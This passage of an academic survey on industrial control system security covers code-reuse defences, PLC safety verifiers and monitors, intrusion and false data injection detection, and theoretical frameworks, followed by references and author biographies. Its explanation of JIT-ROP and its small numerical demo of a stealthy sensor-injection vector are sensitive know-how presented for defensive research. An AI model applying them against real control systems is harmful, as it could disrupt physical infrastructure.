Detecting such attacks is challenging: modern programslink to a large number of libraries, and require dangerous API and system calls to operate correctly [97]. Hence, for these programs, dangerous API and system calls arelegitimate control-flow target s for indirect and direct call instructions, even if fine-grained CFI policies are en-forced. In order to detect code-reuse attacks that exploitthese functions, CFI needs to be combined with addi-tional security checks, e.g., dynamic taint analysis andtechniques that perform argum ent validation. Developing such CFI extensions is an important future research direction. 2) Fine-Grained Code Randomization: Aw i d e l yd e - ployed countermeasure against code-reuse attacks is therandomization of the applications memory layout. Thekey idea here is one of software diversity [110]. The keyobservation is that an adversary typically attempts to compromise many systems using the same attack vector. To mitigate this attack, one can diversify a program im-plementation into multiple and different semanticallye q u i v a l e n ti n s t a n c e s[ 1 1 0 ] .T h eg o a li st of o r c et h ea d v e r -sary to tailor the attack vector for each software instance,making the attack prohibitive. Different approaches canbe taken for realizing software diversity, e.g., memoryrandomization [111], [112], based on a compiler [110], [113], [114], or by binary rewriting and instrumentation [115] [118]. A well-known instance of code randomization is ad- dress space layout randomization (ASLR) which random-izes the base address of shared libraries and the mainexecutable [112]. Unfortunately, ASLR is often bypassedin practice due to its low randomization entropy andmemory disclosure attacks which enable prediction of code locations. To tackle this limitation, a number of fine-grained ASLR schemes have been proposed [115] [120]. The underlying idea is to randomize the codestructure, for instance, by shuffling functions, basicblocks, or instructions (ideally for each program run[117], [118]). With fine-grained ASLR enabled, an adver-sary cannot reliably determine the addresses of interest-ing gadgets based on disclosing a single runtime address. However, a recent just-in-time return-oriented pro- gramming (JIT-ROP) attack, circumvents fine-grained ASLR by finding gadgets and generating the return-oriented payload on the fly [121]. As for any other real-world code-reuse attack, it only requires a memorydisclosure of a single runti me address. However, unlike code-reuse attacks against ASLR, JIT-ROP only requiresthe runtime address of a valid code pointer, without knowing to which precise code part or function it points to. Hence, JIT-ROP can use any code pointer such as re-turn addresses on the stack to instantiate the attack.Based on the leaked address, JIT-ROP can disclose thecontent of multiple memory pages, and generates thereturn-oriented payload at runtime. The key insight ofJIT-ROP is that a leaked code pointer will reside on a4-kB aligned memory page. This can be exploited leveraging a scripting engine (e.g., JavaScript) to deter- mine the affected page s start and end address. After-wards, the attacker can start disassembling therandomized code page from its start address, and identifyuseful return-oriented gadgets. To tackle this class of code-reuse attacks, defenses have been proposed [122] [124]. Readactor leverages ahardware-based approach to enable execute-only memory [124]. 
For this, it exploits Intel's extended page tables to conveniently mark memory pages as nonexecutable. In addition, an LLVM-based instrumented compiler 1) permutes functions; 2) strictly separates code from data; and 3) hides code pointers. As a consequence, a JIT-ROP attacker can no longer disassemble a page (i.e., the code pages are set to nonreadable). In addition, one cannot abuse code pointers located on the application's stack and heap to identify return-oriented gadgets, since Readactor performs code pointer hiding.

Remaining Challenges: CFI provides provable security [125]. That is, one can formally verify that CFI enforcement is sound. In particular, the explicit control-flow checks inserted by CFI into an application provide strong assurance that a program's control flow cannot be arbitrarily hijacked by an adversary. In contrast, code randomization does not put any restriction on the program's control flow. In fact, the attacker can provide any valid memory address as an indirect branch target. Another related problem of protection schemes based on code randomization is side-channel attacks [126], [127]. These attacks exploit timing and fault analysis side channels to infer randomization information. Recently, several defenses have started to combine CFI with code randomization. For instance, Mohan et al. [128] presented opaque CFI (O-CFI). This solution leverages coarse-grained CFI checks and code randomization to prevent return-oriented exploits. For this, O-CFI identifies a unique set of possible target addresses for each indirect branch instruction. Afterwards, it uses the per-indirect-branch set to restrict the target address of the indirect branch to only its minimal and maximal members. To further reduce the set of possible addresses, it arranges basic blocks belonging to an indirect branch set into clusters (so that they are located near each other), and also randomizes their location. However, O-CFI relies on precise static analysis. In particular, it statically determines valid branch addresses for return instructions, which typically leads to coarse-grained policies. Nevertheless, Mohan et al. [128] demonstrate that combining CFI with code randomization is a promising research direction.

B. Novel/Secure Control Architectures

In this section, we consider mitigations for the problem raised in Section III-B1. The threat here is that an adversary may tamper with a controller's logic code, thus subverting its behavior. This can be generalized to the notion of an untrusted controller. We consider four novel architectures for this problem: TSV, a tool for statically checking controller code; C2, a dynamic reference monitor for a running controller; S3A, a controller architecture that represents a middle ground between TSV and C2; and finally, an approach for providing a trusted computing base (TCB) for a controller, so that PLCs may dependably enforce safety properties on themselves.

1) Trusted Safety Verifier (TSV) [81]: As previously discussed, one method for tampering with an ICS process is to upload malicious logic to a PLC. This was demonstrated by the Stuxnet attack.
TSV prevents the uploading of malicious control logic by statically verifying that logic a priori [81]. TSV sits on an embedded device next to a PLC, intercepts all PLC-bound code, and statically verifies it against a set of designer-supplied safety properties. TSV does this in a number of steps. First, the control logic is symbolically executed to produce a symbolic scan cycle. A symbolic scan cycle represents all possible single-scan-cycle executions of the control logic. It then finds feasible transitions between subsequent symbolic scan cycles to form a temporal execution graph (TEG). The TEG is then fed into a model checker, which will verify that a set of linear temporal logic safety properties hold under the TEG model. If the control logic violates any safety property, the model checker will return a counterexample input that would cause the violation, and the control logic will be blocked from running on the PLC. The main drawback of TSV is that the TEG is often a tree structure of bounded depth. Thus, systems beyond a certain complexity cannot be effectively checked by TSV in a reasonable amount of time.

2) C2 Architecture [129]: C2 provides a dynamic reference monitor for sequential and hybrid control systems. Like TSV, C2 enforces a set of engineer-supplied safety properties. However, enforcement in C2 is done at runtime, by an external module positioned between a PLC and the ICS hardware devices. At the end of each PLC scan cycle, a new set of control signals is sent to the ICS devices. C2 will check these signals, along with the current ICS state, against the safety properties. Any unsafe modifications of the plant state are denied. If, at any step, an attempted control signal is denied by C2, it will enact one of a number of deny disciplines to deal with the potentially dangerous operation. One of the main results from the C2 evaluation was that all deny disciplines should support notifying the PLC of the denial, so that it knows the plant did not receive the control signal. A key shortcoming of C2 is that it can only detect violations immediately before they occur. What is preferable is a system that can give advanced warning, as in TSV's static analysis, but that can work for complex ICS, like C2.

3) Secure System Simplex Architecture (S3A) [130]: Similar to how TSV requires a copy of the control logic, S3A requires the high-level system control flow and execution time profiles for the system under observation. Similar to how C2 performs real-time monitoring, S3A aims to detect when the system is approaching an unsafe state. However, unlike C2, S3A aims to give a deterministic time buffer before the system potentially enters the unsafe state [131]. While S3A has the advantage of more advanced detection, it cannot operate on arbitrarily complex systems as C2 can. However, it is appropriate for more complex systems than TSV.

Remaining Challenges: In this review of TSV, C2, and S3A, we see a tradeoff forming: complexity of the monitored system versus amount of advanced warning. TSV sits at one end of this spectrum, offering the most advanced warning for systems of bounded complexity, while C2 sits at the other end, offering last-second detection of unsafe states on arbitrarily complex systems.
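As a concrete illustration of the runtime end of this spectrum, the sketch below shows the kind of end-of-scan-cycle check a C2-style reference monitor performs; the process variables, limits, and deny discipline are hypothetical, and the sketch is not taken from the C2 implementation itself.

```python
# Minimal sketch of a C2-style runtime reference monitor: proposed control
# signals are checked against engineer-supplied safety properties before they
# reach the plant. Variables, limits, and the deny discipline are hypothetical.

SAFETY_PROPERTIES = [
    # (description, predicate over plant state and proposed command)
    ("pump off while tank above high limit",
     lambda state, cmd: not (state["level"] > 95.0 and cmd["pump"] == "on")),
    ("heater duty within bounds",
     lambda state, cmd: 0.0 <= cmd["heater_duty"] <= 0.8),
]

def monitor(state, proposed_cmd):
    """Allow the command, or deny it and report which property failed."""
    for description, holds in SAFETY_PROPERTIES:
        if not holds(state, proposed_cmd):
            # Deny discipline: drop the command and notify the PLC so it
            # knows the plant never received the signal.
            return {"allowed": False, "violated": description}
    return {"allowed": True, "violated": None}

plant_state = {"level": 97.3, "temperature": 61.0}
end_of_scan_cmd = {"pump": "on", "heater_duty": 0.4}

print(monitor(plant_state, end_of_scan_cmd))
# -> {'allowed': False, 'violated': 'pump off while tank above high limit'}
```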
The S3A approach represents a compromise between the two; however, the more complex the system is, the more detailed the control flow and timing information fed to S3A must be. In the future, computational power for verification may become substantial enough to allow full TSV analysis of arbitrarily complex systems; for current, practical solutions, however, this is not a reasonable assumption.

Part of the reason none of the existing architectures can win both ends of the tradeoff is that they all exist outside the PLC. This also adds significant cost and complexity, as they must be physically integrated with an existing control system. An alternative approach is to construct future PLCs to provide a minimal trusted computing base (TCB). One such TCB, whose goal is to restrict the ability to manipulate physical machinery to a small set of privileged code blocks within the PLC memory, is proposed in [132]. This TCB is not itself aware of the ICS physical safety properties. Instead, the goal of this TCB is to protect a privileged set of code blocks that are able to affect the plant, i.e., via control signals. The privileged code blocks then contain the safety properties. Thus, C2- or S3A-like checks are done from within these blocks. This approach has the added benefit that a TSV-like verification of safety properties in the privileged blocks is substantially simpler than verifying an entire system, thus allowing static analysis of more complex systems than TSV.

C. Detection of Control and Sensor Injection Attacks

When considering attacks against ICS, two important channels must be considered: the control channel and the sensor channel. A control channel attack compromises a computer, a controller, or an individual device upstream from the physical process. The compromised entity then injects malicious commands into the system. A sensor channel attack corrupts sensor readings coming from the physical plant in order to cause bad decision making by the controllers receiving those sensor readings (more information about FDI can be found in Section III-B2). In this section, we review detection of control channel attacks and FDI. Techniques for control channel attacks inherit from the existing body of work in network and host intrusion detection, whereas FDI detection stems largely from the theory of state estimation and control.

1) Detecting Control Channel Attacks: A survey of SCADA intrusion detection between 2004 and 2008 can be found in [133]. It presents a taxonomy in which detection systems are categorized based on the following.

- Degree of SCADA specificity: How well does the solution leverage some of the unique aspects of SCADA systems?
- Domain: Does the solution apply to any SCADA system, or is it restricted to a single domain, e.g., water?
- Detection principle: What method is used to categorize events: behavioral, specification, anomaly, or a combination?
- Intrusion-specific: Does the solution only address intrusions, or is it also useful for fault detection?
- Time of detection: Is the threat detected and reported in real time, or only as an offline operation?
- Unit of analysis: Does the solution examine network packets, API calls, or other events?
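The detection-principle axis above spans behavioral, specification, and anomaly approaches. As a toy illustration of the behavioral/anomaly end (of the kind revisited later in this section), the sketch below pairs a deliberately simple one-step autoregressive predictor with fixed Shewhart-style absolute limits; the coefficients, limits, and trace are invented, and in practice the predictor would be fitted to observed process data.

```python
# Toy behavioural/anomaly detection: a one-step autoregressive prediction
# residual plus fixed Shewhart-style absolute bounds on a process variable.
# Coefficients, limits, and data are placeholders.

AR_COEFF = 1.0          # x_hat[k] = AR_COEFF * x[k-1] + AR_BIAS (fitted offline)
AR_BIAS = 0.0
RESIDUAL_LIMIT = 3.0    # allowed |x[k] - x_hat[k]|
SHEWHART_LO, SHEWHART_HI = 30.0, 70.0   # absolute bounds on the variable

def detect(samples):
    alerts = []
    for k in range(1, len(samples)):
        predicted = AR_COEFF * samples[k - 1] + AR_BIAS
        if abs(samples[k] - predicted) > RESIDUAL_LIMIT:
            alerts.append((k, "autoregression residual"))
        if not SHEWHART_LO <= samples[k] <= SHEWHART_HI:
            alerts.append((k, "Shewhart limit"))
    return alerts

# Steady behaviour around 50, one abrupt spoofed reading, then a slow drift
# that the residual check misses but the absolute limits eventually catch.
trace = [50.0, 50.2, 49.8, 50.1, 62.0, 50.0] + [50 + 2.0 * i for i in range(1, 13)]
print(detect(trace))
```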
We find that among the categorized systems there are some deficiencies. First, they lack a well-defined threatmodel. Second, they do not account for the degree of heterogeneity found in real-world ICS, e.g., use of multi- ple protocols. Finally, the proposed systems were not suf-ficiently evaluated for false positives, and insufficient strategies for dealing with false positives were given. We review recent work that aims at greater feasibility [134]. In this approach, a specification is derived fort r a f f i cb e h a v i o ro v e rs m a r tm e t e rn e t w o r k s ,a n df o r m a lverification is used to ensure that any network trace conforming to the specification will not violate a given security policy. The specification is formed based on:1) the smart meter protocols (in this case, the ANSI C12family); 2) a system model consisting of state machinesthat describe a meter s lifetime, e.g., provisioning,normal operation, error conditions, etc., as well as the network topology; and 3) a set of constraints on allowed behavior. An evaluation of a prototype implementationshowed that no more than 1.6% of CPU usage wasneeded for monitoring the specification at meters. Onepotential limitation of this approach is the need for ex-pert-provided information in the form of the systemmodel and constraints on allowed behavior. An alternative approach, which is not dependent on specifications, is given in [135]. This solution builds a model of good behavior through observation of threetypes of quantities visible to PLCs: sensor measurements,control signals, and events such as alarms. The behavioralmodel uses autoregression to predict the next systemstate. To avoid low-and-slow attacks that autoregressionmay not catch, upper and lower Shewart control limitsare used as absolute bounds on process variables that may not be crossed. Their evaluation on one week of network traces from a prototype control system showed that mostnormal behaviors were properly modeled by the autore-gression. There were, however, several causes of devia-tions including nearly constant signals that occasionallydeviated briefly before returning to their prior constantvalue, and a counter variable that experienced a delayedincrement. Such cases would represent false positives for the autoregression model, but would not necessarily trip the Shewart control limits. 2) Detecting FDI: While control channel attacks di- rectly target controllers with malicious commands, FDIattacks can be more subtle, as they used forged sensordata to cause the controller to make misguided decisions.Detection of FDI attacks is thus deeply rooted in the ex- isting discipline of state estimation discussed earlier. This will require a) a measurement model that relates themeasured quantity to the physical value that caused it,i.e., heat propagation; and b) an error detection methodto allow for faulty measurements to be discarded. We described one attack against power grid state esti- mation in which estimation errors could be caused bytampering with a relatively small number of PMUs [85]. In one approach to detecting such an attack, one can use a small, strategically selected set of tamper-resistantmeters to provide independent measurements [136].These out-of-band measurements are used to determinethe accuracy of the remaining majority of measure-ments contributing to the state estimation. In a second approach [137], two security indices are computed for a given state estimator. 
The first index measures how well the state estimator's bad data detector can handle attacks where the adversary is limited to a few tampered measurements. The second index measures how well the bad data detector can handle attacks where the adversary only makes small changes to measurement magnitudes. Along with the grid topology information, these indices can be useful in determining how to allocate security functionality, such as retrofitted encryption, to various measurement devices.

The third approach differs from the above two in that it does not attempt to select a set of meters for security enhancements but, instead, places weights on the grid topology to reflect the trustworthiness of various PMUs [138]. The trust weights are integrated into a distributed Kalman filtering algorithm to produce a state estimation that more accurately reflects the trustworthiness of the individual PMUs. In the evaluation of the distributed Kalman filters, it was found that they converged to the correct state estimate in approximately 20 steps.

From these approaches to detecting both control channel and FDI attacks, one can see that an effective method for detecting ICS intrusions involves monitoring the physical process itself, as well as its interactions with the controller and sensors.

D. Theoretical ICS Security Frameworks

A number of recent advances have generalized the increasing body of results to provide theoretical frameworks. In this section, we review such theoretical frameworks based on the following three approaches: 1) modeling attacker behavior and identifying likely attack scenarios; 2) defining the general detection and identification of attacks against ICS; and 3) the distribution of security enhancements in ICSs where controllers share network infrastructure. A common theme in these frameworks is the optimal distribution of security protections in large, legacy ICSs.

Adding protections like cryptographic communications to legacy equipment is expensive. Thus, it is preferable to secure the most vulnerable portions of an ICS. Teixeira et al. describe a risk management framework for ICSs [139]. Starting with the notion of security indices [137], this work looks at methods for identifying the most vulnerable measurements in both static and dynamic control systems. For static control systems, it is assumed that adversaries wish to execute the minimum-cost attack. In the static case, the α_k index described in Section IV-C is sufficient, and methods are given for efficiently computing α_k for large systems.

In the case of dynamic systems, the maximum-impact, minimum-resource attacks are defined as a multiobjective optimization problem. For such a problem, the basic security indices do not suffice. Instead, the multiobjective problem is transformed into a maximum-impact, resource-constrained problem. An example is given where this is used to calculate the attack vectors for a quadruple-tank system. The resulting optimal attack strategy can be used to allocate defenses such as data encryption in the ICS.
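The security indices above quantify how few coordinated measurement changes an attack needs. The stealth property itself, reported for the DC state estimation model in the FDI work discussed earlier, can be reproduced numerically: any attack vector in the column space of the measurement matrix shifts the estimate without changing the residual seen by bad-data detection. The sketch below (assuming NumPy is available, with a made-up measurement matrix) illustrates this.

```python
# Numerical sketch of the false data injection idea: with a DC model
# z = H x + e, any attack vector a = H c leaves the least-squares residual
# unchanged while shifting the estimate by c. H below is made up.

import numpy as np

H = np.array([[1.0, 0.0],
              [0.0, 1.0],
              [1.0, -1.0],
              [2.0, 1.0]])          # 4 measurements, 2 state variables
x_true = np.array([1.0, 0.5])
rng = np.random.default_rng(0)
z = H @ x_true + 0.01 * rng.standard_normal(4)   # noisy measurements

def estimate(z_vec):
    """Least-squares state estimate and residual norm (unit weights)."""
    x_hat, *_ = np.linalg.lstsq(H, z_vec, rcond=None)
    return x_hat, np.linalg.norm(z_vec - H @ x_hat)

c = np.array([0.3, -0.2])           # state bias the attacker wants to induce
a = H @ c                           # coordinated false data on the sensors

x_clean, r_clean = estimate(z)
x_attack, r_attack = estimate(z + a)

print("estimate shift :", np.round(x_attack - x_clean, 6))    # ~= c
print("residual change:", round(abs(r_attack - r_clean), 12)) # ~= 0
```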
Another framework considers generalizing attacks against ICSs and describes the fundamental limitations of monitors against these attacks [140]. Assuming that an attack monitor is consistent, i.e., does not generate false positives, it is shown that some attacks are undetectable if there is an initial state which produces the same final state as an attack. Additionally, it is shown that some attacks cannot be distinguished from others. These results are applicable to stealthy [141], replay [142], and FDI attacks.

The previous two approaches considered ways of modeling attacks and attack likelihoods against individual control loops. However, in some systems, a number of otherwise independent control processes are actually somewhat dependent due to the shared network. In this case, a distributed denial of service (DDoS) attack against one controller may affect others. The problem of interdependent control systems is addressed using a game-theoretic approach in [143]. The noncooperative game consists of two stages: 1) each control loop (player) chooses whether to apply security enhancements; and 2) each player applies the optimal control input to its plant (a toy numerical instance of this game appears at the end of this section).

In the nonsocial form of this game, players only attempt to minimize their own cost, which consists of the operating costs of the plant plus the cost of adding and maintaining security measures. For this form of the game, with M players, there is shown to exist a unique equilibrium solution. The solutions to this game may not be globally optimal, due to externalities imposed by players that opt out of security enhancements. To solve this, penalties are introduced for players that do not select security enhancements, leading to a guaranteed unique solution that is also globally optimal. While such a game-theoretic approach is useful in distributing the cost of security enhancements, actually achieving robust control in distributed systems is more difficult, especially when the system in question is nonlinear. To this end, a modification to a traditional model-predictive control (MPC) problem has been suggested [144]. Adding a robustness constraint to the MPC problem can bound the values of future states.

These theoretical frameworks offer opportunities to understand and improve defenses. However, it is important to understand the assumptions behind the frameworks. For example, the above approaches assume the following.

1) Attackers are omniscient, knowing the exact measurement, control, and process matrices for each system, as well as all system states.
2) Attackers are nearly omnipotent, with the ability to compromise any measurement and control vector. There is an important exception here, which is that detectors are assumed to be immune to attackers.
3) Detectors do not create false positives and systems are completely deterministic (first two approaches).
4) Security enhancements can significantly mitigate DDoS attacks on various network architectures (third approach).

In any assessment procedure, the actual set of assumptions should be considered and compared with those of the theoretical framework being used in the assessment.
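The toy instance below makes the externality argument of the shared-network game concrete for two players. Every number (base operating cost, security cost, DDoS exposure cost, penalty) is invented, and the published model is formulated over M players with plant control costs rather than these hand-picked constants. With these numbers, the only equilibrium without a penalty leaves both loops unprotected even though joint investment has lower total cost; a penalty for opting out restores the socially optimal outcome.

```python
# Toy instance of the shared-network security investment game: two control
# loops choose whether to add security. All cost numbers are invented.

from itertools import product

BASE_COST = 10.0
SECURITY_COST = 6.0
# Extra expected cost from shared-network DDoS exposure, indexed by how many
# of the two players remain unprotected (both pay it, since the network is shared).
DDOS_COST = {0: 0.0, 1: 4.0, 2: 9.0}

def cost(my_choice, other_choice, penalty=0.0):
    unprotected = (not my_choice) + (not other_choice)
    c = BASE_COST + DDOS_COST[unprotected]
    c += SECURITY_COST if my_choice else penalty
    return c

def equilibria(penalty=0.0):
    """Pure-strategy Nash equilibria: no player gains by switching alone."""
    eqs = []
    for a, b in product([True, False], repeat=2):
        a_ok = cost(a, b, penalty) <= cost(not a, b, penalty)
        b_ok = cost(b, a, penalty) <= cost(not b, a, penalty)
        if a_ok and b_ok:
            eqs.append((a, b))
    return eqs

# Total cost at (False, False) is 38 versus 32 at (True, True): the
# no-penalty equilibrium is socially suboptimal; a penalty of 6 fixes it.
print("equilibria without penalty:", equilibria(penalty=0.0))
print("equilibria with penalty   :", equilibria(penalty=6.0))
```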
V. CONCLUSION

ICT-based ICS can deliver real-time information, resulting in automatic and intelligent control of industrial processes. Inherently dangerous processes, however, are no longer immune to cyber threats, as vulnerable devices, formats, and protocols are no longer hosted on dedicated infrastructure, due to cost pressures. Consequently, ICS infrastructure has become increasingly exposed, either by direct connection to the Internet or via interfaces to utility IT systems. Therefore, inflicting substantial damage or widespread disruption may be possible with a comprehensive analysis of the target systems. Publicly available information, combined with default and well-known ICS configuration details, could potentially allow a resource-rich adversary to mount a large-scale attack.

This paper surveyed the state of the art in ICS security, identified outstanding research challenges in this emerging area, and motivated the deployment of cybersecurity methods and tools to ICS. All levels of the multilayered ICS architecture can be targeted by sophisticated cyberattacks that disturb the control process of the ICS. Assessing the vulnerabilities of ICS requires the development of a uniquely-ICS multilayered testbed that establishes as many pathways as possible between the cyber and physical components in the ICS. These pathways can assist in determining the real-world consequences in terms of the technical impacts and the severity of the outcomes. An important direction of research is to develop effective methods to detect ICS intrusions that involve monitoring the physical processes themselves, as well as their interactions with the controller and sensors.

Acknowledgment

The authors from New York University (NYU) would like to thank S. Lee, P. Robison, P. Stergiou, and S. Kim from Consolidated Edison for their continuous support on the project, Platform Profiling in Legacy and Modern Control and Monitoring Systems.

REFERENCES
[1] K. Stouffer, J. Falco, and K. Scarfone, Guide to industrial control systems (ICS) security, NIST Special Publication 800-82, 2011. [Online]. Available: http://csrc.nist.gov/publications/nistpubs/800-82/SP800-82-final.pdf
[2] E. Hayden, M. Assante, and T. Conway, An abbreviated history of automation & industrial controls systems and cybersecurity, 2014. [Online]. Available: https://ics.sans.org/media/An-Abbreviated-History-of-Automation-and-ICS-Cybersecurity.pdf
[3] European Network and Information Security Agency (ENISA), Protecting industrial control systems: Recommendations for Europe and member states, 2011. [Online]. Available: https://www.enisa.europa.eu/
[4] T. M. Chen and S. Abu-Nimeh, Lessons from Stuxnet, Computer, vol. 44, no. 4, pp. 91-93, 2011.
[5] P. Muncaster, Stuxnet-like attacks beckon as 50 new SCADA threats discovered, 2011. [Online]. Available: http://www.v3.co.uk/v3-uk/news/2045556/stuxnet-attacks-beckon-scada-threats-discovered
[6] J. Weiss, Assuring industrial control system (ICS) cyber security. [Online]. Available: http://csis.org/files/media/csis/pubs/080825_cyber.pdf
[7] R. Anderson et al., Measuring the cost of cybercrime, in The Economics of Information Security and Privacy. Berlin, Germany: Springer-Verlag, 2013, pp. 265-300.
[8] Willis Group, Energy market review 2014 - Cyber-attacks: Can the market respond? 2014. [Online]. Available: http://www.willis.com/
[9] Y. Mo et al., Cyber-physical security of a smart grid infrastructure, Proc. IEEE, vol. 100, no. 1, pp.
195 209, Jan. 2012. [10] P. Radmand, A. Talevski, S. Petersen, and S. Carlsen, Taxonomy of wireless sensor network cyber security attacks in the oil and gas industries, in Proc. 24th Int. Conf. Adv. Inf. Netw. Appl. , 2010, pp. 949 957. [11] S. Amin, X. Litrico, S. Sastry, and A. M. Bayen, Cyber security of waterSCADA systems Part I: Analysis and experimentation of stealthy deception attacks, IEEE Trans. Control Syst. Technol. , vol. 21, no. 5, pp. 1963 1970, 2013. [12] What is a programmable logic controller (PLC)? [Online]. Available: http://www. wisegeek.org/what-is-a-programmable- logic-controller.htm. [13] A. Scott, What is a distributed control system (DCS)? [Online]. Available:http://blog.cimation.com/blog/bid/198186/ What-is-a-Distributed-Control-System-DCS. [14] Kaspersky, Cyperthreats to ICS systems, 2014. [Online]. Available: http://media. kaspersky.com/en/business-security/ critical-infrastructure-protection/ Cyber_A4_Leaflet_eng_web.pdf. [15] J. Meserve, Mouse click could plunge city into darkness, experts say, CNN ,2 0 0 7 . [Online]. Available: http://www.cnn.com/ 2007/US/09/27/power.at.risk/index.html. [16] Security Matters, The Aurora attack. [Online]. Available: http://www.secmatters. com/casestudy10. [17] D. Kushner, The real story of Stuxnet, 2013. [Online]. Available: http://spectrum.ieee.org/telecom/security/ the-real-story-of-stuxnet. [18] M. B. Line, A. Zand, G. Stringhini, and R. Kemmerer, Targeted attacks againstindustrial control systems: Is the power industry prepared? in Proc. 2nd Workshop Smart Energy Grid Security , 2014, pp. 13 22. [19] C. Miller and C. Valasek, Remote exploitation of an unaltered passenger vehicle, 2015. [Online]. Available: https:// www.defcon.org/html/defcon-23/ dc-23-speakers.html#Miller. [20] K. Thomas, Hackers demo Jeep security hack, 2015. [Online]. Available: http:// www.welivesecurity.com/2015/07/22/hackers-demo-jeep-security-hack/. [21] N. G. Tsoutsos, C. Konstantinou, and M. Maniatakos, Advanced techniques for designing stealthy hardware trojans, in Proc. 51st Design Autom. Conf. , 2014, pp. 1 4. [22] Y. Jin, M. Maniatakos, and Y. Makris, Exposing vulnerabilities of untrusted computing platforms, in Proc. 30th IEEE Int. Conf. Comput. Design , 2012, pp. 131 134. [23] K. Rosenfeld and R. Karri, Attacks and Defenses for jtag, 2010. [24] M. F. Breeuwsma, Forensic imaging of embedded systems using jtag (boundary-scan), Digital Investigation , vol. 3, no. 1, pp. 32 42, 2006. [25] J. Barnaby, Exploiting embedded systems, Black Hat 2006, 2006. [Online]. Available: http://www.blackhat.com/ presentations/bh-europe-06/ bh-eu-06-Jack.pdf. [26] D. Schneider, USB flash drives are more dangerous than you think. [Online]. Available: http://spectrum.ieee.org/ tech-talk/computing/embedded-systems/ usb-flash-drives-are-more-dangerous-than-you-think. [27] USB Killer. [Online]. Available: http:// kukuruku.co/hub/diy/usb-killer. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1053McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. [28] bunnie and xobs, 30c3d, The exploration and exploitation of an SD memory card. [Online]. Available: http://bunniefoo.com/ bunnie/sdcard-30c3-pub.pdf. [29] S. Skorobogatov, Flash memory bumping attacks, in Proc. Cryptogr. Hardware Embedded Syst. , 2010, pp. 158 172. [30] R. Templeman and A. 
ABOUT THE AUTHORS

Stephen McLaughlin received the Ph.D. degree in computer science and engineering from the Pennsylvania State University, State College, PA, USA, in 2014. He is a Senior Engineer at Samsung Research America, Mountain View, CA, USA. His work is concerned with the ongoing security and safe operation of control systems that have already suffered a partial compromise. His results in this area have been published in the ACM Conference on Computer and Communications Security (CCS), the Internet Society Network and Distributed System Security Symposium (NDSS), and IEEE Security and Privacy Magazine. As a part of the Samsung KNOX security team, he identifies and responds to vulnerabilities in Samsung's smartphones, mobile payments, and other devices near you right now.

Charalambos Konstantinou (Student Member, IEEE) received the five-year diploma degree in electrical and computer engineering from the National Technical University of Athens, Athens, Greece. He is currently working toward the Ph.D. degree in electrical engineering at the Polytechnic School of Engineering, New York University, Brooklyn, NY, USA.
His interests include hardware security with particular focus on embedded systems and smart grid technologies.

Xueyang Wang received the B.S. degree in automation from Zhejiang University, Zhejiang, China, in 2008 and the M.S. and Ph.D. degrees in computer engineering and electrical engineering from the Tandon School of Engineering, New York University, Brooklyn, NY, USA, in 2010 and 2015, respectively. His research interests include secure computing architectures, virtualization and its application to cybersecurity, hardware support for software security, and hardware security.

Lucas Davi received the Ph.D. degree in computer science from the Technische Universität Darmstadt, Darmstadt, Germany, in 2015. He is an independent Claude Shannon research group leader of the Secure and Trustworthy Systems group at Technische Universität Darmstadt. He is also a researcher at the Intel Collaborative Research Institute for Secure Computing (ICRI-SC). His research focuses on software exploitation techniques and defenses. In particular, he explores exploitation attacks such as return-oriented programming (ROP) for ARM and Intel-based systems.

Ahmad-Reza Sadeghi received the Ph.D. degree in computer science with the focus on privacy-protecting cryptographic systems from the University of Saarland, Saarbrücken, Germany, in 2003. He is a full Professor for Computer Science at the Technische Universität Darmstadt, Darmstadt, Germany. He is the head of the System Security Lab at the Center for Advanced Security Research Darmstadt (CASED), and the Director of the Intel Collaborative Research Institute for Secure Computing (ICRI-SC) at TU Darmstadt. Prior to academia, he worked in research and development at telecommunications enterprises, among others Ericsson Telecommunications. His research interests include systems security, mobile and embedded systems security, cyberphysical systems, trusted and secure computing, applied cryptography, and privacy-enhanced systems. Dr. Sadeghi served as general/program chair as well as program committee member of many established security conferences. He also served on the editorial board of the ACM Transactions on Information and System Security (TISSEC), and as guest editor of the IEEE Transactions on Computer-Aided Design (Special Issue on Hardware Security and Trust). Currently, he is the Editor-in-Chief of IEEE Security and Privacy Magazine, and on the editorial board of ACM Books. He has been awarded the renowned German prize Karl Heinz Beckurts for his research on trusted and trustworthy computing technology and its transfer to industrial practice. The award honors excellent scientific achievements with high impact on industrial innovations in Germany.

Michail Maniatakos received the B.Sc. degree in computer science and the M.Sc. degree in embedded systems from the University of Piraeus, Piraeus, Greece, in 2006 and 2007, and the M.Sc. and M.Phil. degrees and the Ph.D. degree in electrical engineering from Yale University, New Haven, CT, USA, in 2009, 2010, and 2012.
He is an Assistant Professor of Electrical and Computer Engineering at New York University (NYU) Abu Dhabi, Abu Dhabi, UAE, and a Research Assistant Professor at the NYU Polytechnic School of Engineering, Brooklyn, NY, USA. He is the Director of the MoMA Laboratory (nyuad.nyu.edu/momalab), NYU Abu Dhabi. His research interests, funded by industrial partners and the U.S. Government, include robust microprocessor architectures, privacy-preserving computation, as well as industrial control systems security. He has authored several publications in IEEE transactions and conferences, and holds patents on privacy-preserving data processing. Dr. Maniatakos is currently the Co-Chair of the Security track at the IEEE International Conference on Computer Design (ICCD) and the IEEE International Conference on Very Large Scale Integration (VLSI-SoC). He also serves on the technical program committee for various conferences, including the IEEE/ACM Design Automation Conference (DAC), the International Conference on Computer-Aided Design (ICCAD), ITC, and the International Conference on Compilers, Architectures and Synthesis for Embedded Systems (CASES). He has organized several workshops on security, and he currently is the faculty lead for the Embedded Security Challenge held annually at Cyber Security Awareness Week (CSAW), Brooklyn, NY, USA.

